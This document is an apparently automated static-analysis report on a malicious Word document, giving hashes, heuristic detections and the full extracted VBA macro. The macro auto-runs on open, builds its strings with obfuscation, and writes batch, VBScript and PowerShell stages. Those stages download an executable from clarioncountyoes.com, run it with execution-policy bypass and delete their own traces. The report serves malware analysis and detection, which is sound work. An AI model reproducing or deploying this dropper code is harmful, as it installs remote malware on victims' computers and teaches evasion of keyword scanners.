Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 12717c6c0420cbd3…

MALICIOUS

Office (OLE)

198.5 KB Created: 2015-01-28 16:27:00 Authoring application: Microsoft Office Word First seen: 2016-02-27
MD5: 0cfe35a7771fdb3bbb87a001dd0f7756 SHA-1: f9e8e843fca98e4d69d06de503b8295d056dd20b SHA-256: 12717c6c0420cbd338117548bc1e7dce25732c7e9f11535a6e70c8ecaf5292ec
434 Risk Score

Heuristics 15

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 9 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
         retVal = Shell(ASKJD, 0)
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  • Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URL
    A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
         USER = Environ("username")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://clarioncountyoes.com/tmp/jok.exe Referenced by macro
    • http://office365.com/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14658 bytes
SHA-256: b747ab69f99fc0dff6ec4f68527789750af20f5a50cee1212f3ef3e1d7c1c2f2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
    h
End Sub
Sub h()
Dim MY_FILENDIR, ASDASDSA, MY_FILDIR, XPFILEDIR
     USER = Environ("username")
     ds = 100
     jks = ds
     PST2 = "a" + "dobe" & "acd-u" & "pdate"
     PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1"
     ASОDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
     
     VBT2 = "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te"
     VBTXP2 = "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p"
     BART2 = "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date"
     
     VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
     VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
     BART = BART2 + Chr(Abs(46)) + Chr(Abs(98)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(ds + 16))) + ""
      
     MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
     ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
     ASDASDSA = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
     MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
     XPFILEDIR = "c:\Windows\Temp\" + VBTXP
     TRT = "c:\Windows\Temp\" + BART
     KRT = TRT
     HYF = KRT
     
      On Error Resume Next
     SetAttr MY_FILENDIR, vbNormal
     
     If (Len(Dir(MY_FILENDIR)) <> 0) Then
      Kill MY_FILENDIR
     End If
     
     On Error Resume Next
     SetAttr ASDASDSA, vbNormal
     If (Dir(ASDASDSA) <> "") Then
      Kill ASDASDSA
     End If
     
     On Error Resume Next
     SetAttr MY_FILDIR, vbNormal
     If (Dir(MY_FILDIR) <> "") Then
      Kill MY_FILDIR
     End If
     
     On Error Resume Next
     SetAttr XPFILEDIR, vbNormal
     If (Dir(XPFILEDIR) <> "") Then
      Kill XPFILEDIR
     End If
      
     Dim FileNumber As Integer
     Dim FileNumb As Integer
     Dim FileNu As Integer
     Dim FileNuG As Integer
     Dim FileNukk As Integer
     Dim FileNs As Integer
     Dim mttt As Integer
     Dim retVal As Variant
     Dim jskw As Integer
     FileNumber = FreeFile
     FileNumb = FreeFile
     FileNu = FreeFile
     FileNukk = FreeFile
     FileNs = FreeFile
     FileNuG = FreeFile
     Dim objWMIService As Variant
    Dim colOperatingSystems As Variant
    Dim objOperatingSystem As Variant
    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
    Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
    For Each objOperatingSystem In colOperatingSystems
        SysReport = SysReport & "The operating system on this computer is " & _
            objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
    Next
     
     Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
     Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
     For Each objOperatingSystem In colOperatingSystems
        winverstr = objOperatingSystem.Version
    Next
    
    
    winver = Val(winverstr)
    WaitFor (1)
    jskw = winver
 
 If (jskw <= 5.5) Then
     Open HYF For Output As #FileNuG
     Print #FileNuG, "@echo off"
     Print #FileNuG, "ping 1.1.2.2 -n" & " 2"
     Print #FileNuG, ":ksadatk"
     PRINTFILENUGSAASJHKDJSAKHDS = "ASKDHJASKDJKAHDSHJKASH  HJKAHJSA JK"
     PRISAKUDHNTFILENUGSAASJHKDJSAKHDS = "ASKDHJASSJKADHKDJKAHDSHJKASH  HJKAHJKASHDJSA JK"
     Print #FileNuG, ":kcscriptw"
     Print #FileNuG, ":asdsadas"
     Print #FileNuG, ":cscripdiqwojd"
     Print #FileNuG, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) + ""
     Print #FileNuG, "ping 1.1.2.2 -n" & " 2"
     Print #FileNuG, "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + "x" + "e"
     Print #FileNuG, ":loop"
     Print #FileNuG, "ping 1.1.2.2 -n" & " 1"
     Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
     Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
     Print #FileNuG, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + BART + Chr(34) + " goto loop"
     Print #FileNuG, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + VBTXP + Chr(34) + " goto loop"
     Print #FileNuG, "exit"
     Close #FileNuG
     
     WaitFor (2)
     mttt = 88

     Open XPFILEDIR For Output As #FileNumber
     Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://clarioncountyoes.com/tmp/jok" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
     Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
     
     Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2" + "." + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(mttt - 4) + Chr(84) + Chr(80) + Chr(mttt - 54) + ")"
     'Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
     
     Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
     
     Print #FileNumber, "objXMLHTTP.send() "
     Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
     
     Print #FileNumber, "Set objADOStream = C" + "reateO" + "bject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "
     
     Print #FileNumber, "objADOStream.Open "
     Print #FileNumber, "objADOStream.Type = 1"
     Print #FileNumber, "objADOStream.Write objXMLHTTP.Re" + "sponse" + "Body "
     Print #FileNumber, "objADOStream.Position = 0 "
     Print #FileNumber, "objADOStream.SaveToFile strTecation "
     Print #FileNumber, "objADOStream.Close "
     Print #FileNumber, "Set objADOStream = Nothing "
     Print #FileNumber, "End if "
     Print #FileNumber, "Set objXMLHTTP = Nothing"
     Print #FileNumber, "Set objShell " & "=" + " " + Chr(Asc("C")) + "reate" + "O" + "bject(" + Chr(34) + "W" + "S" + "cript." + "S" + "hell" + Chr(34) + ")"
     Close #FileNumber
     
     WaitFor (1)
     
     ASKJD = TRT
     retVal = Shell(ASKJD, 0)
     
End If


If (winver > 5.5) Then
     Open MY_FILENDIR For Output As #FileNumber
     Print #FileNumber, "$down = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
     Print #FileNumber, "$url  = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://clarioncountyoes.com/tmp/jok" & ".e" & "x" + "e';"
     Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
     Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Saf" & "ari/600.1.25';" + ""
     Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
     Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
     Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
    
     Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "v" + Chr(39) + Chr(43) + Chr(39) + "bs" + Chr(39) + ";"
     Print #FileNumber, "$b" + "a" + "tFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART2; Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "b" + Chr(39) + Chr(43) + Chr(39) + "at" + Chr(39) + ";"
     Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "p" + Chr(39) + Chr(43) + Chr(39) + "s1" + Chr(39) + ";"
     
     Print #FileNumber, "Start-Sleep -s 15;"
     Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c  'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e';     "
     Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
     Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
     Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
     Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
     Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
     Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
     Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
     Close #FileNumber
    
    Open MY_FILDIR For Output As #FileNumb
    Print #FileNumb, "Dim dff"
    Print #FileNumb, "dff = 68"
    Print #FileNumb, "c" & "ur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irec" + "tory = left(WSc" & "ript.ScriptFullName," & "(L" + "en(W" + "S" + "cri" + "pt.Sc" + "riptFullName))-(len(W" + "Sc" + "ript.ScriptName)))"
    Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & Chr(34) & Chr(34) & "&" & "S" & Chr(34) & Chr("&") & Chr(34) & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
    Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST2 + Chr(34) + "&" + Chr(34) + "." + Chr(34) + "&" + Chr(34) + "p" + Chr(34) + "&" + Chr(34) + "s1" + Chr(34)
    Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
    Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
    Close #FileNumb
    
    Open ASDASDSA For Output As #FileNs
    Print #FileNs, "@echo off"
    Print #FileNs, "ping 1.1.2.2 -n" & " 2"
    Print #FileNs, "chcp 1251"
    Print #FileNs, ":csakclasjdklas"
    Print #FileNs, "set Var1=" + Chr(34) + "." + Chr(34)
    Print #FileNs, "set Var2=" + Chr(34) + "v" + Chr(34)
    Print #FileNs, "set Var3=" + Chr(34) + "bs" + Chr(34)
    Print #FileNs, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT2 + Chr(34) + "%Var1%%Var2%%Var3%"
    Print #FileNs, "exit"
    Close #FileNs
       
    SetAttr MY_FILENDIR, vbNormal
    SetAttr ASDASDSA, vbNormal
    SetAttr MY_FILDIR, vbNormal
     
    WaitFor (1)
    SJAKLD = ASDASDSA
    retVal = Shell(SJAKLD, 0)
End If

     
     findTest
    secondTest
    For Each myStoryRange In ActiveDocument.StoryRanges
    With myStoryRange.Find
        .Text = "<" & "sel" & "ect>"
        .Replacement.Text = " "
        .Wrap = wdFindContinue
        .Execute Replace:=wdReplaceAll
    End With
    Next myStoryRange

    For Each myStoryRange In ActiveDocument.StoryRanges
    With myStoryRange.Find
        .Text = "</s" & "ele" & "ct>"
        .Replacement.Text = " "
        .Wrap = wdFindContinue
        .Execute Replace:=wdReplaceAll
    End With
    Next myStoryRange
    
    For Each myStoryRange In ActiveDocument.StoryRanges
    With myStoryRange.Find
        .Text = "<" & "in" & "box>"
        .Replacement.Text = " "
        .Wrap = wdFindContinue
        .Execute Replace:=wdReplaceAll
    End With
    Next myStoryRange

    For Each myStoryRange In ActiveDocument.StoryRanges
    With myStoryRange.Find
        .Text = "</" & "in" & "box>"
        .Replacement.Text = " "
        .Wrap = wdFindContinue
        .Execute Replace:=wdReplaceAll
    End With
    Next myStoryRange
     

End Sub
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds

Do While Timer < SngSec
DoEvents
Loop

End Sub

Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Sub findTest()
Dim firstTerm As String
Dim secondTerm As String
Dim rrtt As Range
Dim selRange As Range
Dim selectedText As String

Set rrtt = ActiveDocument.Range
firstTerm = "<" + "s" + "e" & "le" + "ct>"
secondTerm = "<" + "/" + "se" + "l" & "ec" + "t>"
ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
With rrtt.Find
.Text = firstTerm
.MatchWholeWord = True
.Execute
ASKUKKIEJ = "aasdlkasjdask as8d j dnkjh12kh1 sad"
rrtt.Collapse direction:=wdCollapseEnd
Set selRange = ActiveDocument.Range
selRange.Start = rrtt.End
.Text = secondTerm
.MatchWholeWord = True
.Execute
ASKSASADW = "asjldklas"
rrtt.Collapse direction:=wdCollapseStart
selRange.End = rrtt.Start
selectedText = selRange.Delete
End With
End Sub

Sub secondTest()
Dim firstTerm As String
Dim secondTerm As String
Dim myRanget As Range
Dim yytt As Range
Dim selRanget As Range
Dim selectedTextt As String

Set yytt = ActiveDocument.Range
firstTerm = "<" + "in" & "bo" + "x>"
secondTerm = "</" + "in" & "bo" + "x>"
With yytt.Find
.Text = firstTerm
.MatchWholeWord = True
.Execute
ASKIEJ = "ask as8d j dnkjh12kh1 sad"
yytt.Collapse direction:=wdCollapseEnd

Set selRanget = ActiveDocument.Range
selRanget.Start = yytt.End
.Text = secondTerm
.MatchWholeWord = True
.Execute

yytt.Collapse direction:=wdCollapseStart
selRanget.End = yytt.Start
selectedTextt = selRanget
selRanget.Font.Color = wdColorBlack
End With
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{BA28BAA2-0C82-4E2C-94AC-198B7DA9AD1A}{94A472EF-6DB4-413E-9B70-2AED5E41CC23}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.